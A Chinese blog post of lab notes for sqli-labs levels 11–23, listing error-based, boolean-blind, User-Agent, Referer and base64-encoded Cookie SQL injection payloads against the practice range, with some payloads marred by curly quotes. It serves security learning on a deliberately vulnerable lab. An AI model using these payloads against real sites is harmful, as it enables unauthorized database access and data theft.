sqli-labs靶场笔记(四)

sqli-labs靶场笔记(四)

Less-11【报错注入|'注入】

该网站使用POST请求方式,使用Live HTTP header进行注入操作
在这里插入图片描述
判断username存在注入
在这里插入图片描述
在这里插入图片描述
得到username对应的密码
使用burp-repeater模块

payload 1

uname=admin’ and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin’ and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-12【报错注入|")注入】

在这里插入图片描述
使用单引号直接爆错【没有回显】,尝试使用双引号【回显报错】
在这里插入图片描述
在这里插入图片描述
使用burp

payload 1

uname=admin") and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin") and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-13【报错注入|’)注入】

开始先用单引号试水,报错回显
在这里插入图片描述
在这里插入图片描述

使用burp

payload 1

uname=admin’) and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin’) and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-14【报错注入|"注入】

单引号注入没有回显,尝试双引号【报错回显】
在这里插入图片描述
在这里插入图片描述
使用burp

payload 1

uname=admin" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin" and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-15【Boolean盲注|'注入】

下面展示 payload

admin' order by 2 #

这里采用Boolean盲注
使用单引号、双引号试探,没有明显报错回显,不为报错注入
在这里插入图片描述
在这里插入图片描述
存在注入
在这里插入图片描述
在这里插入图片描述
该表存在2个属性列
使用burp的Repeater模块
在这里插入图片描述
在这里插入图片描述
判断数据库名长度为8
使用burp的爆破模块
在这里插入图片描述
在这里插入图片描述
得到数据库名为security

Less-16【Boolean盲注】|")注入】

下面展示一些 payload

admin") #
admin") order by 2 #
admin") and ascii(substr((select database()),1,1))=115 #
admin")  and ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 1,1),1,1))=95 #

在这里插入图片描述

在这里插入图片描述
得到数据库名security
在这里插入图片描述
得到数据库一个表名

Less-17【报错注入|'注入】

下面展示payload

admin' and (extractvalue(1,concat('~',(select database()))))#

在这里插入图片描述
在这里插入图片描述
接下来使用burp的repeater模块
在这里插入图片描述
在这里插入图片描述

Less-18【user-agent注入|报错注入|'注入|注释符屏蔽】

值得注意的是该题屏蔽了注释符:–+和#,所以改用‘a’=‘a代替
下面展示payload

' and (extractvalue(1,concat('~',select database()))) and 'a'='a

在这里插入图片描述

该题对输入框的两个地方进行了设置、过滤,故无法向其中实现注入;但是,发现查询语句从user Agent写入
在这里插入图片描述

在这里插入图片描述

Less-19【referer注入|报错注入|'注入|注释符屏蔽】

下面展示payload

referer:http://XXX.XXX.XXX.XXX:XXX/sqli-labs/Less-19/' and (extractvalue(1,concat('~',(select database()))))and 'a'='a

在这里插入图片描述

在这里插入图片描述

Less-20【Cookie注入|报错注入|'注入】

下面展示 payload

Cookie: uname=admin' and extractvalue(1,concat('~',(select database()))) #

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Less-21【Cookie注入|报错注入|’)注入】

')进行base64Encode发现存在注入
下面展示 payload

Cookie: uname=YWRtaW4nKQ==
//这里basedecode为:admin’)
Cookie:uname=YWRtaW4nKSBhbmQgKGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgnficsKHNlbGVjdCBkYXRhYmFzZSgpKSkpKSAj
//这里base64decode为:admin') and (extractvalue(1,concat('~',(select database())))) #

在这里插入图片描述
在这里插入图片描述

Less-22【Cookie注入|报错注入|"注入】

下面展示 payload

Cookie: uname=YWRtaW4i
//这里basedecode为:admin"
Cookie:uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSkpKSAj
//这里base64decode为:admin" and extractvalue(1,concat('~',(select database()))) #

在这里插入图片描述

在这里插入图片描述

Less-23【报错注入|’注入|注释符屏蔽】

下面展示 payload

id=1' and extractvalue(1,concat('~',(select database()))) and 'a'='a

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值